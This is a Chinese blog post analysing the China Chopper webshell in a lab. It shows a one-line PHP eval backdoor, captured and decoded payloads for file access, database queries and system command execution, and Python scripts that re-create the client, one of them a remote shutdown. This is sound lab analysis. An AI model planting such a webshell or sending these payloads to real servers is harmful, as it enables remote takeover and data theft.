环境:
1. xp1:192.168.110.132(受害机)
PHPnow 1.5.6
Wireshark1.12.0
2. xp2:192.168.110.129(攻击机)
中国菜刀20100812
3. Kali:192.168.110.128
Python 2.7.3
过程:
首先,我们在xp1中的web目录下写入一句话<?php eval($_POST[‘wood’]);?>,保存为1.php。
然后我们用菜刀连接上,并配置好数据库管理信息。
0x01目录管理
我们在xp1抓包获取如下信息:
-
POST /1.php HTTP/1.1
-
X-Forwarded-For: 199.1.88.29
-
Referer: http://192.168.110.132
-
Content-Type: application/x-www-form-urlencoded
-
User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
-
Host: 192.168.110.132
-
Content-Length: 744
-
Cache-Control: no-cache
-
wood=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=QzpcXFBIUG5vdy0xLjUuNi40MjM3NDkzNzM2XFxodGRvY3NcXA%3D%3D
很明显是经过url编码,和base64编码,我们对其进行解码得到如下信息:
-
wood=@eval(base64_decode($_POST[z0]));
-
&z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;//关闭错误信息显示,关闭执行时间限制,关闭魔术引号
-
$D=base64_decode($_POST["z1"]);
-
$F=@opendir($D);
-
if($F==NULL)
-
{
-
echo("ERROR:// Path Not Found Or No Permission!");
-
}
-
else
-
{
-
$M=NULL;$L=NULL;
-
while($N=@readdir($F))
-
{
-
$P=$D."/".$N;
-
$T=@date("Y-m-d H:i:s",@filemtime($P));
-
@$E=substr(base_convert(@fileperms($P),10,8),-4);
-
$R="t".$T."t".@filesize($P)."t".$E."";
-
if(@is_dir($P))
-
$M.=$N."/".$R;
-
else
-
$L.=$N.$R;
-
}
-
echo $M.$L;
-
@closedir($F);
-
};
-
echo("|<-");
-
die();
-
&z1=C:\PHPnow-1.5.6.4237493736\htdocs\
0x02下载文件
我们从xp1上下载1.txt,其内容为test。
抓包信息:
-
POST /1.php HTTP/1.1
-
Content-Type: application/x-www-form-urlencoded
-
Referer: http://192.168.110.132
-
User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
-
Host: 192.168.110.132
-
Content-Length: 472
-
Cache-Control: no-cache
-
wood=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRj1nZXRfbWFnaWNfcXVvdGVzX2dwYygpP3N0cmlwc2xhc2hlcygkX1BPU1RbInoxIl0pOiRfUE9TVFsiejEiXTskZnA9QGZvcGVuKCRGLCJyIik7aWYoQGZnZXRjKCRmcCkpe0BmY2xvc2UoJGZwKTtAcmVhZGZpbGUoJEYpO31lbHNle2VjaG8oIkVSUk9SOi8vIENhbiBOb3QgUmVhZCIpO307ZWNobygifDwtIik7ZGllKCk7&z1=C%3A%5C%5CPHPnow-1.5.6.4237493736%5C%5Chtdocs%5C%5C1.txt
同样解码后得到信息:
-
wood=@eval(base64_decode($_POST[z0]));
-
&z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;
-
$F=get_magic_quotes_gpc()?stripslashes($_POST["z1"]):$_POST["z1"];
-
$fp=@fopen($F,"r");
-
if(@fgetc($fp))
-
{
-
@fclose($fp);@readfile($F);
-
}
-
else
-
{
-
echo("ERROR:// Can Not Read");
-
};
-
echo("|<-");die();
-
&z1=C:\PHPnow-1.5.6.4237493736\htdocs\1.txt
0x03上传文件
我们从xp2上传一个名为1.png的图片到xp1上。。
抓包信息如下:
-
POST /1.php HTTP/1.1
-
Content-Type: application/x-www-form-urlencoded
-
Referer: http://192.168.110.132
-
User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
-
Host: 192.168.110.132
-
Content-Length: 210271
-
Cache-Control: no-cache
-
&wood=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskZj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JGM9JF9QT1NUWyJ6MiJdOyRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOyRjPXN0cl9yZXBsYWNlKCJcbiIsIiIsJGMpOyRidWY9IiI7Zm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MikkYnVmLj11cmxkZWNvZGUoIiUiLnN1YnN0cigkYywkaSwyKSk7ZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1Zik%2FIjEiOiIwIik7O2VjaG8oInw8LSIpO2RpZSgpOw%3D%3D&z1=QzpcXFBIUG5vdy0xLjUuNi40MjM3NDkzNzM2XFxodGRvY3NcXDEucG5n&z2=89504E470D0A1A0A0000000D49484452000000230000001E0802000000295F307D00000006624B474400FF00FF00FFA0BDA793000000097048597300000EC400000EC401952B0E1B0000010B494441544889EDD73D8A85301000E09924164230B1F2069E417B3B6FE921AC3C8057F014064104F3F70A415CF7EDEE5BF42D5B64BA8461BEFC1499A0F77E18064484B7459EE70080DEFBBAAEBDF7EF93DAB60500060094D26D4A29358EE3751511D33495521E27D971A094EAFB9E3106D7C2185396E57792738E31B66FF1F5BAD334CDF30C0094D22449E23876CE9DD2AE2E1F00B4D6555565590600EBBA364D13C7F1E7B41B24E75C14455B7544B4D63E4D23D7A5172348410A52908214A4FF28DDF0E61242B4D6CBB200C0BAAE5F353C37485114755DB7772C42889F25428831E6B712220A218E80318690F3BD7C90A4944551DCD5593E91ACB55B75CE39E7FC22B3C7E978F0CF7E000F64E0671AD7A7382D0000000049454E44AE426082
-
解码得:
01 |
&wood=@ eval ( base64_decode ( $_POST [z0]));&z0=@ ini_set ( "display_errors" , "0" );@set_time_limit(0);@set_magic_quotes_runtime(0); echo ( "->|" );; |
02 |
$f = base64_decode ( $_POST [ "z1" ]); |
03 |
$c = $_POST [ "z2" ]; |
04 |
$c = str_replace ( "r" , "" , $c ); |
05 |
$c = str_replace ( "n" , "" , $c ); |
06 |
$buf = "" ; |
07 |
for ( $i =0; $i < strlen ( $c ); $i +=2) |
08 |
$buf .=urldecode( "%" . substr ( $c , $i ,2)); |
09 |
echo (@fwrite( fopen ( $f , "w" ), $buf )? "1" : "0" );; |
10 |
echo ( "|<-" ); die ();&z1=C:\PHPnow-1.5.6.4237493736\htdocs\1.png |
11 |
|
0x04数据库管理
数据库dvwa,账号:root 密码:toor
执行:SHOW TABLES FROM `dvwa`
抓包信息:
-
POST /1.php HTTP/1.1
-
X-Forwarded-For: 199.1.88.29
-
Referer: http://192.168.110.132
-
Content-Type: application/x-www-form-urlencoded
-
User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
-
Host: 192.168.110.132
-
Content-Length: 741
-
Cache-Control: no-cache
-
wood=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskbT1nZXRfbWFnaWNfcXVvdGVzX2dwYygpOyRoc3Q9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejEiXSk6JF9QT1NUWyJ6MSJdOyR1c3I9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejIiXSk6JF9QT1NUWyJ6MiJdOyRwd2Q9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejMiXSk6JF9QT1NUWyJ6MyJdOyRkYm49JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejQiXSk6JF9QT1NUWyJ6NCJdOyRUPUBteXNxbF9jb25uZWN0KCRoc3QsJHVzciwkcHdkKTskcT1AbXlzcWxfcXVlcnkoIlNIT1cgVEFCTEVTIEZST00gYHskZGJufWAiKTt3aGlsZSgkcnM9QG15c3FsX2ZldGNoX3JvdygkcSkpe2VjaG8odHJpbSgkcnNbMF0pLmNocig5KSk7fUBteXNxbF9jbG9zZSgkVCk7O2VjaG8oInw8LSIpO2RpZSgpOw%3D%3D&z1=localhost&z2=root&z3=toor&z4=dvwa
解码:
01 |
wood=@ eval ( base64_decode ( $_POST [z0]));&z0=@ ini_set ( "display_errors" , "0" );@set_time_limit(0);@set_magic_quotes_runtime(0); echo ( "->|" );; |
02 |
$m =get_magic_quotes_gpc(); $hst = $m ? stripslashes ( $_POST [ "z1" ]): $_POST [ "z1" ]; |
03 |
$usr = $m ? stripslashes ( $_POST [ "z2" ]): $_POST [ "z2" ]; |
04 |
$pwd = $m ? stripslashes ( $_POST [ "z3" ]): $_POST [ "z3" ]; |
05 |
$dbn = $m ? stripslashes ( $_POST [ "z4" ]): $_POST [ "z4" ]; |
06 |
$T =@mysql_connect( $hst , $usr , $pwd ); |
07 |
$q =@mysql_query( "SHOW TABLES FROM `{$dbn}`" ); |
08 |
while ( $rs =@mysql_fetch_row( $q )) |
09 |
{ |
10 |
echo (trim( $rs [0]). chr (9)); |
11 |
} |
12 |
@mysql_close( $T );; echo ( "|<-" ); |
13 |
die (); |
14 |
&z1=localhost&z2=root&z3=toor&z4=dvwa |
执行:SELECT * FROM `users` ORDER BY 1 DESC LIMIT 0,20
POST /1.php HTTP/1.1
-
X-Forwarded-For: 199.1.88.29
-
Referer: http://192.168.110.132
-
Content-Type: application/x-www-form-urlencoded
-
User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
-
Host: 192.168.110.132
-
Content-Length: 866
-
Cache-Control: no-cache
-
wood=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskbT1nZXRfbWFnaWNfcXVvdGVzX2dwYygpOyRoc3Q9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejEiXSk6JF9QT1NUWyJ6MSJdOyR1c3I9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejIiXSk6JF9QT1NUWyJ6MiJdOyRwd2Q9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejMiXSk6JF9QT1NUWyJ6MyJdOyRkYm49JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejQiXSk6JF9QT1NUWyJ6NCJdOyR0YWI9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejUiXSk6JF9QT1NUWyJ6NSJdOyRUPUBteXNxbF9jb25uZWN0KCRoc3QsJHVzciwkcHdkKTtAbXlzcWxfc2VsZWN0X2RiKCRkYm4pOyRxPUBteXNxbF9xdWVyeSgiU0hPVyBDT0xVTU5TIEZST00gYHskdGFifWAiKTt3aGlsZSgkcnM9QG15c3FsX2ZldGNoX3JvdygkcSkpe2VjaG8odHJpbSgkcnNbMF0pLiIgKCIuJHJzWzFdLiIpIi5jaHIoOSkpO31AbXlzcWxfY2xvc2UoJFQpOztlY2hvKCJ8PC0iKTtkaWUoKTs%3D&z1=localhost&z2=root&z3=toor&z4=dvwa&z5=users
解码:
01 |
wood=@ eval ( base64_decode ( $_POST [z0]));&z0=@ ini_set ( "display_errors" , "0" );@set_time_limit(0);@set_magic_quotes_runtime(0); echo ( "->|" );; |
02 |
$m =get_magic_quotes_gpc(); $hst = $m ? stripslashes ( $_POST [ "z1" ]): $_POST [ "z1" ]; |
03 |
$usr = $m ? stripslashes ( $_POST [ "z2" ]): $_POST [ "z2" ]; |
04 |
$pwd = $m ? stripslashes ( $_POST [ "z3" ]): $_POST [ "z3" ]; |
05 |
$dbn = $m ? stripslashes ( $_POST [ "z4" ]): $_POST [ "z4" ]; |
06 |
$tab = $m ? stripslashes ( $_POST [ "z5" ]): $_POST [ "z5" ]; |
07 |
$T =@mysql_connect( $hst , $usr , $pwd ); |
08 |
@mysql_select_db( $dbn ); $q =@mysql_query( "SHOW COLUMNS FROM `{$tab}`" ); |
09 |
while ( $rs =@mysql_fetch_row( $q )){ echo (trim( $rs [0]). " (" . $rs [1]. ")" . chr (9));}@mysql_close( $T );; |
10 |
echo ( "|<-" ); |
11 |
die (); |
12 |
&z1=localhost&z2=root&z3=toor&z4=dvwa&z5=users |
执行:SELECT `user` FROM `users` ORDER BY 1 DESC LIMIT 0,10
-
POST /1.php HTTP/1.1
-
X-Forwarded-For: 199.1.88.29
-
Referer: http://192.168.110.132
-
Content-Type: application/x-www-form-urlencoded
-
User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
-
Host: 192.168.110.132
-
Content-Length: 1027
-
Cache-Control: no-cache
-
wood=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskbT1nZXRfbWFnaWNfcXVvdGVzX2dwYygpOyRoc3Q9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejEiXSk6JF9QT1NUWyJ6MSJdOyR1c3I9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejIiXSk6JF9QT1NUWyJ6MiJdOyRwd2Q9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejMiXSk6JF9QT1NUWyJ6MyJdOyRkYm49JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejQiXSk6JF9QT1NUWyJ6NCJdOyRzcWw9YmFzZTY0X2RlY29kZSgkX1BPU1RbIno1Il0pOyRUPUBteXNxbF9jb25uZWN0KCRoc3QsJHVzciwkcHdkKTtAbXlzcWxfc2VsZWN0X2RiKCRkYm4pOyRxPUBteXNxbF9xdWVyeSgkc3FsKTskaT0wO3doaWxlKCRjb2w9QG15c3FsX2ZpZWxkX25hbWUoJHEsJGkpKXtlY2hvKCRjb2wuIlx0fFx0Iik7JGkrKzt9ZWNobygiXHJcbiIpO3doaWxlKCRycz1AbXlzcWxfZmV0Y2hfcm93KCRxKSl7Zm9yKCRjPTA7JGM8JGk7JGMrKyl7ZWNobyh0cmltKCRyc1skY10pKTtlY2hvKCJcdHxcdCIpO31lY2hvKCJcclxuIik7fUBteXNxbF9jbG9zZSgkVCk7O2VjaG8oInw8LSIpO2RpZSgpOw%3D%3D&z1=localhost&z2=root&z3=toor&z4=dvwa&z5=U0VMRUNUIGB1c2VyYCBGUk9NIGB1c2Vyc2AgT1JERVIgQlkgMSBERVNDIExJTUlUIDAsMTA%3D[/code="php"]解码:
wood=@eval(base64_decode($_POST[z0]));&z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;
-
$m=get_magic_quotes_gpc();
-
$hst=$m?stripslashes($_POST["z1"]):$_POST["z1"];
-
$usr=$m?stripslashes($_POST["z2"]):$_POST["z2"];
-
$pwd=$m?stripslashes($_POST["z3"]):$_POST["z3"];
-
$dbn=$m?stripslashes($_POST["z4"]):$_POST["z4"];
-
$sql=base64_decode($_POST["z5"]);
-
$T=@mysql_connect($hst,$usr,$pwd);
-
@mysql_select_db($dbn);
-
$q=@mysql_query($sql);
-
$i=0;
-
while($col=@mysql_field_name($q,$i))
-
{
-
echo($col."t|t");
-
$i++;
-
}
-
echo("rn");
-
while($rs=@mysql_fetch_row($q))
-
{ for($c=0;$c<$i;$c++)
-
{ echo(trim($rs[$c]));
-
echo("t|t");
-
}
-
echo("rn");
-
}
-
@mysql_close($T);;
-
echo("|<-");die();
-
&z1=localhost&z2=root&z3=toor&z4=dvwa&z5=SELECT `user` FROM `users` ORDER BY 1 DESC LIMIT 0,10
0x05虚拟终端
我们在菜刀的虚拟终端中执行:whoami
抓包信息:
-
POST /1.php HTTP/1.1
-
X-Forwarded-For: 199.1.88.29
-
Referer: http://192.168.110.132
-
Content-Type: application/x-www-form-urlencoded
-
User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
-
Host: 192.168.110.132
-
Content-Length: 550
-
Cache-Control: no-cache
-
wood=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyAneyRzfSciOiIvYyB7JHN9Ijskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIpOztlY2hvKCJ8PC0iKTtkaWUoKTs%3D&z1=Y21k&z2=Y2QgL2QgIkM6XFBIUG5vdy0xLjUuNi40MjM3NDkzNzM2XGh0ZG9jc1wiJndob2FtaSZlY2hvIFtTXSZjZCZlY2hvIFtFXQ%3D%3D
解码:
01 |
wood=@ eval ( base64_decode ( $_POST [z0]));&z0=@ ini_set ( "display_errors" , "0" );@set_time_limit(0);@set_magic_quotes_runtime(0); echo ( "->|" );; |
02 |
$p = base64_decode ( $_POST [ "z1" ]); |
03 |
$s = base64_decode ( $_POST [ "z2" ]); |
04 |
$d =dirname( $_SERVER [ "SCRIPT_FILENAME" ]); |
05 |
$c = substr ( $d ,0,1)== "/" ? "-c '{$s}'" : "/c {$s}" ; |
06 |
$r = "{$p} {$c}" ; |
07 |
@system( $r . " 2>&1" );; |
08 |
echo ( "|<-" ); |
09 |
die (); |
10 |
&z1=cmd&z2=cd /d "C:PHPnow-1.5.6.4237493736htdocs"&whoami& echo [S]&cd& echo [E] |
分析
通过上面的信息我们可以发现,菜刀是通过发送base64编码过后的php命令来实现操作的,
那么我们自然可以去模拟菜刀的功能,下面我用2个python脚本实现。
dir.py:
01 |
import urllib |
02 |
params = urllib.urlencode({ "wood" : "@eval(base64_decode($_POST[z0]));" , "z0" :"QGlua |
03 |
V9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b |
04 |
3Rlc19ydW50aW1lKDApO2VjaG8oIi0 + fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7J |
05 |
EY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPc |
06 |
iBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkR |
07 |
ikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c |
08 |
3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiL |
09 |
kBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlI |
10 |
CRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7 "," z1 |
11 |
":" QzpcXFBIUG5vdy0xLjUuNi40MjM3NDkzNzM2XFxodGRvY3NcXA = = "}) |
12 |
f = urllib.urlopen( "http://192.168.110.132/1.php" ,params) |
13 |
print f.read() |
shutdown.py:
1 |
import urllib |
2 |
params = urllib.urlencode({ "wood" : "@eval(base64_decode($_POST[z0]));" , "z0" :"ZWNo |
3 |
byBgc2h1dGRvd24gLXMgLXQgMGA7"}) |
4 |
f = urllib.urlopen( "http://192.168.110.132/1.php" ,params) |
5 |
f.read() |
本文始发于微信公众号(T00ls):强大的利器-菜刀工作原理分析
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论